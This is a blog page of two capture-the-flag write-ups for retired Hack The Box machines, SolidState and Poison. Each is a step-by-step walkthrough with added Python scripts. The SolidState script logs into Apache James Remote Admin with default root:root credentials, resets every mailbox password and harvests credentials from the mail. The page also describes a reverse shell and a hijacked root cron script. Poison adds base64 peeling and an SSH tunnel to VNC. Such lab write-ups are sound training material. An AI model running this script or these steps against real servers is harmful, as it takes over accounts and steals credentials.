Tuesday, February 5, 2019
SolidState
SOLIDSTATE
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine SolidState, which is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- SolidState's IP is 10.10.10.51:
- Scanning all ports with Nmap reveals 6 open ports:
- Connecting with the browser:
- Scanning those 6 open ports more deeply (service and version detection):
- So the James Remote Admin 2.3.2 tool is running on port 4555; this version of Apache James is vulnerable to the following exploit:
https://www.exploit-db.com/exploits/35513
- Reading the exploit's content we learn that the default credentials are root:root:
3 - EXPLOITATION
- The connection to port 4555 using the credentials root:root is successful:
- HELP lists the available commands:
- Listing users:
- Resetting passwords:
- Now, using these new passwords, let's connect to the POP3 service running on port 110:
- Users james, thomas and mailadmin have no messages to retrieve:
- User john has an interesting message from james in which user mindy's credentials are discussed:
- However, the most interesting task is to retrieve user mindy's two messages:
- In the second message we can read the password P@55W0rd1!2@:
- Using this password to try an SSH connection as mindy:
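The steps of this section are one procedure: authenticate to James Remote Admin with the default root:root, list the accounts, reset their passwords, then read each mailbox over POP3 looking for credentials. The Python script below is an added example written for this page; it is not code from the original post nor from exploit 35513. It assumes SolidState's IP and ports from the write-up, the James 2.3.2 prompt wording ('Login id:', 'Welcome', 'user: NAME'), and the constructed sample reply and message embedded in it; it generalizes the manual telnet session by handling every account at once:

```python
"""Apache James 2.3.2 Remote Admin pivot: reset mailbox passwords, then read the mail over POP3.

Added example for this write-up; not code from the original post or from exploit 35513.
Assumed: SolidState's IP and ports from the write-up, James' default admin credentials
root:root, and the prompt/response wording of James 2.3.2 ('Login id:', 'Welcome', 'user: NAME').
"""
import poplib
import re
import socket

JAMES_HOST = "10.10.10.51"   # SolidState, per the write-up
ADMIN_PORT = 4555            # James Remote Administration Tool
POP3_PORT = 110

# Constructed sample of a 'listusers' reply, shaped like James 2.3.2 output (not captured from the box).
SAMPLE_LISTUSERS = "Existing accounts 5\nuser: james\nuser: thomas\nuser: john\nuser: mindy\nuser: mailadmin\n"
# Constructed sample message; the real ones on the box are only visible in the write-up's screenshots.
SAMPLE_MAIL = ("From: james@solidstate\nTo: mindy@solidstate\nSubject: Welcome\n\n"
               "Your temporary password is: Tmp-Pass-123\nChange it at first login.\n")
CRED_RE = re.compile(r"\b(password|passwd|pass|credential)s?\b", re.IGNORECASE)


def parse_listusers(text):
    """Account names from a 'listusers' reply: 'Existing accounts N' then one 'user: NAME' line each."""
    return re.findall(r"^user:\s*(\S+)", text, flags=re.MULTILINE)


def reset_commands(users, new_password):
    """One 'setpassword USER PASS' per account; James answers 'Password for USER reset'."""
    return ["setpassword %s %s" % (u, new_password) for u in users]


def credential_lines(message):
    """Lines of a mail that mention a password: what we were reading mindy's mailbox for."""
    return [ln.strip() for ln in message.splitlines() if CRED_RE.search(ln)]


def _drain(sock, idle=1.5):
    """Read until the server is quiet for `idle` seconds; the admin tool prints no prompt after commands."""
    sock.settimeout(idle)
    buf = b""
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            buf += chunk
    except socket.timeout:
        pass
    return buf.decode(errors="replace")


def james_reset_all(host, admin_user, admin_pass, new_password, port=ADMIN_PORT):
    """Log into James Remote Admin, list accounts and set every password to new_password.

    Destructive and noisy: the mailbox owners lose access, so on a real engagement
    record what you changed. Returns the list of accounts that were reset.
    """
    with socket.create_connection((host, port), timeout=10) as s:
        _drain(s)                                   # banner + 'Login id:'
        s.sendall((admin_user + "\r\n").encode())
        _drain(s)                                   # 'Password:'
        s.sendall((admin_pass + "\r\n").encode())
        if "Welcome" not in _drain(s):
            raise RuntimeError("James admin login failed (default root:root not accepted?)")
        s.sendall(b"listusers\r\n")
        users = parse_listusers(_drain(s))
        for cmd in reset_commands(users, new_password):
            s.sendall((cmd + "\r\n").encode())
            _drain(s)                               # 'Password for NAME reset'
        s.sendall(b"quit\r\n")
    return users


def pop3_dump(host, user, password, port=POP3_PORT):
    """Every message in the mailbox as text (headers and body), fetched with RETR."""
    conn = poplib.POP3(host, port, timeout=10)
    try:
        conn.user(user)
        conn.pass_(password)
        count, _ = conn.stat()
        msgs = []
        for i in range(1, count + 1):
            _, lines, _ = conn.retr(i)
            msgs.append(b"\n".join(lines).decode(errors="replace"))
        return msgs
    finally:
        conn.quit()


if __name__ == "__main__":
    new_pw = "Reset-Me-1"   # assumed throwaway value, not the one used in the write-up
    for user in james_reset_all(JAMES_HOST, "root", "root", new_pw):
        for n, msg in enumerate(pop3_dump(JAMES_HOST, user, new_pw), 1):
            for hit in credential_lines(msg):
                print("%s message %d: %s" % (user, n, hit))
```

Resetting the passwords locks the real owners out of their mail, which is loud on anything other than a lab box, so note what was changed. The sample reply and message in the block exist only so the parsing can be exercised offline; the real messages are only in the write-up's screenshots.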
4 - READING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- However this shell is not very powerful, because it is a restricted shell in which a lot of essential commands are unavailable:
- To start the privilege escalation process let's copy the script of exploit 35513 locally; its payload can be modified to suit our own interest:
- Giving it execution permissions:
- Setting up a Netcat listener matching the modified payload:
- Running 35513.py against SolidState's IP:
- To get the payload executed somebody has to log in, for instance user mindy:
- As a consequence we get a reverse shell, which can then be upgraded successfully:
- This shell allows more commands than the previous one:
- At this point let's look at the running processes and which users (mindy, james, ...) own them:
- It seems that a process inside the folder /opt is being run with root privileges, and going there we discover that tmp.py is owned by root and is also world writable:
- Reading tmp.py:
- Modifying tmp.py so that a reverse shell is spawned:
- After 3 minutes a root shell is spawned:
- Checking that tmp.py is scheduled as a cron job every 3 minutes:
6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
Sunday, February 3, 2019
Poison
POISON
- Layout for this exercise:
1 - INTRODUCTION
- The goal of this exercise is to develop a hacking process for the vulnerable machine Poison, which is a retired machine from the Hack The Box pentesting platform:
https://www.hackthebox.eu
2 - ENUMERATION
- Poison's IP is 10.10.10.84:
- Scanning with Nmap, it seems there are just 2 open ports and the operating system is FreeBSD:
- Going deeper on ports 22 (SSH) and 80 (HTTP):
- Connecting with the browser we find an application for testing local .php scripts:
- Checking ini.php:
- info.php:
- phpinfo.php:
- listfiles.php reveals a promising text file called pwdbackup.txt:
- By the way, before going ahead, we detect the presence of an LFI (Local File Inclusion) vulnerability, though this will not be our attack vector:
- Anyway, from /etc/passwd we learn of the existence of a user called charix:
- Reading pwdbackup.txt we find a password that has been base64 encoded 13 times:
- Copying it locally to the attacking machine:
- Now, applying the base64 decoding process 13 times, we find a password:
https://codebeautify.org/base64-decode
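Decoding 13 times in a web tool works, but a script is faster and leaves a record of what was done. The Python below is an added example written for this page, not the post's code. It assumes the final password is printable text that is not itself valid base64, which lets it go beyond the fixed count of 13 and stop on its own; its sample password is constructed, since the real one is only visible in the write-up's screenshot:

```python
"""Peel layered base64 off a 'backup' like Poison's pwdbackup.txt.

Added example for this write-up, not code from the original post. The write-up
knows the password was encoded 13 times; this version also handles the general
case where the layer count is unknown, stopping when the data is no longer base64.
Assumed: the final secret is printable text that is not itself valid base64.
"""
import base64
import binascii
import re

B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def looks_like_base64(data):
    """Whitespace-insensitive test: base64 alphabet only, padded to a multiple of 4."""
    s = b"".join(data.split())
    return bool(s) and len(s) % 4 == 0 and B64_ALPHABET.match(s.decode("ascii", "replace")) is not None


def decode_layers(blob, layers):
    """Decode exactly `layers` times (13 for pwdbackup.txt); line breaks in the file are tolerated."""
    data = blob.encode() if isinstance(blob, str) else blob
    for _ in range(layers):
        data = base64.b64decode(b"".join(data.split()), validate=True)
    return data.decode()


def peel_base64(blob, max_layers=64):
    """Decode until the content stops being base64; returns (text, layers_removed)."""
    data = blob.encode() if isinstance(blob, str) else blob
    layers = 0
    while layers < max_layers and looks_like_base64(data):
        try:
            data = base64.b64decode(b"".join(data.split()), validate=True)
        except (binascii.Error, ValueError):
            break
        layers += 1
    return data.decode(errors="replace").strip(), layers


def layer_base64(secret, layers):
    """Build a pwdbackup.txt-style blob: encode `layers` times, wrapped at 76 columns like the file."""
    data = secret.encode()
    for _ in range(layers):
        data = base64.encodebytes(data)
    return data.decode()


# Constructed sample; the real password is only shown in the write-up's screenshot.
SAMPLE_SECRET = "S3cret-Pass!2019"
SAMPLE_BACKUP = layer_base64(SAMPLE_SECRET, 13)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_BACKUP
    text, n = peel_base64(blob)
    print("%d layer(s) removed: %s" % (n, text))
```

decode_layers is the faithful version of the manual 13-step process and raises binascii.Error if asked for one layer too many. peel_base64 can overshoot by one layer if the secret happens to consist of base64-alphabet characters with a length that is a multiple of 4, which is why it also returns the layer count; compare it with the expected 13 when that number is known.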
3 - EXPLOITATION
- This password allows an SSH connection for user charix:
4 - CAPTURING THE 1st FLAG
- Reading user.txt:
5 - PRIVILEGE ESCALATION
- Aside from user.txt there is a secret.zip, which we try to unzip without success:
- A file named secret is created, but it is empty and useless, so it's probably a good idea to remove it:
- Let's move secret.zip to Kali:
- Unzipping secret.zip with the password found before:
- Now the file secret looks like a valid password; at least it's not empty:
- Let's transfer it from Kali to Poison, so that it can be used later:
- At this point of the exploitation, sockstat (a FreeBSD command) lists all open sockets (option -4 for IPv4):
https://www.freebsd.org/cgi/man.cgi?query=sockstat&sektion=1&manpath=freebsd-release-ports
- Poison is listening locally (127.0.0.1) on ports 5801 and 5901 for VNC (Virtual Network Computing) connections:
- However both ports are closed externally, so we cannot reach them directly from Kali:
- The solution is to use SSH tunneling (local port forwarding), which is explained thoroughly here:
https://www.hackingarticles.in/comprehensive-guide-on-ssh-tunneling/
- vncviewer is the client for the remote VNC virtual desktop connection, pointed at the tunnelled port:
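The last steps of this section are one procedure: find the services bound only to 127.0.0.1, forward them with SSH local port forwarding, and point vncviewer at the forwarded port with the recovered password file. The Python below is an added example written for this page, not the post's code. It assumes the column layout of FreeBSD's sockstat -4 -l (the embedded sample output is constructed, not captured from Poison), the SSH user charix, and a vncviewer that accepts -passwd (TigerVNC and TightVNC do):

```python
"""Find loopback-only listeners on a FreeBSD host and reach them through an SSH tunnel.

Added example for this write-up, not code from the original post. Assumed: the
column layout of FreeBSD's 'sockstat -4 -l', the SSH user charix, and that the
same port numbers are used on the Kali side of the forward.
"""
import shlex
import sys

TARGET = "10.10.10.84"     # Poison's IP from the write-up
SSH_USER = "charix"

# Constructed sample of 'sockstat -4 -l' output (FreeBSD column layout; not captured from Poison).
SAMPLE_SOCKSTAT = """\
USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     Xvnc       529   1  tcp4   127.0.0.1:5901        *:*
root     Xvnc       529   3  tcp4   127.0.0.1:5801        *:*
root     sshd       620   4  tcp4   *:22                  *:*
www      httpd      583   4  tcp4   *:80                  *:*
"""


def loopback_listeners(sockstat_text):
    """(user, command, port) for each TCP socket bound only to 127.0.0.1, sorted by port.

    Sockets bound to '*' are reachable from outside anyway; only loopback ones need a tunnel.
    """
    out = []
    for line in sockstat_text.splitlines():
        cols = line.split()
        if len(cols) < 7 or not cols[4].startswith("tcp"):   # skips the header line too
            continue
        addr, _, port = cols[5].rpartition(":")
        if addr == "127.0.0.1" and port.isdigit():
            out.append((cols[0], cols[1], int(port)))
    return sorted(out, key=lambda t: t[2])


def ssh_tunnel_command(user, host, ports):
    """ssh -N -L PORT:127.0.0.1:PORT ... : one local forward per loopback port, same number on both ends."""
    cmd = ["ssh", "-N"]
    for p in ports:
        cmd += ["-L", "%d:127.0.0.1:%d" % (p, p)]
    return cmd + ["%s@%s" % (user, host)]


def vncviewer_command(local_port, passwd_file):
    """Connect through the forward, reading the VNC password from a file (the unzipped 'secret').

    '::' selects an explicit port rather than a display number; 5901 is display :1 (RFB),
    while 5801 is the HTTP front end for the Java applet viewer and is not an RFB endpoint.
    """
    return ["vncviewer", "-passwd", passwd_file, "127.0.0.1::%d" % local_port]


if __name__ == "__main__":
    text = SAMPLE_SOCKSTAT if sys.stdin.isatty() else sys.stdin.read()
    listeners = loopback_listeners(text)
    for user, command, port in listeners:
        print("loopback-only: %s (%s) on %d" % (command, user, port))
    ports = [port for _, _, port in listeners]
    print("tunnel: ", shlex.join(ssh_tunnel_command(SSH_USER, TARGET, ports)))
    print("viewer: ", shlex.join(vncviewer_command(5901, "secret")))
```

Feed it the real output with `ssh charix@10.10.10.84 sockstat -4 -l | python3 tunnel_vnc.py`, then run the printed ssh command in one terminal (it asks for charix's password and then stays silent because of -N) and the vncviewer command in another, with the secret file in the current directory.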
6 - CAPTURING THE 2nd FLAG
- Reading root.txt:
- Also, root.txt can be transferred to Kali with Netcat:
- netstat lists the active connections on Poison: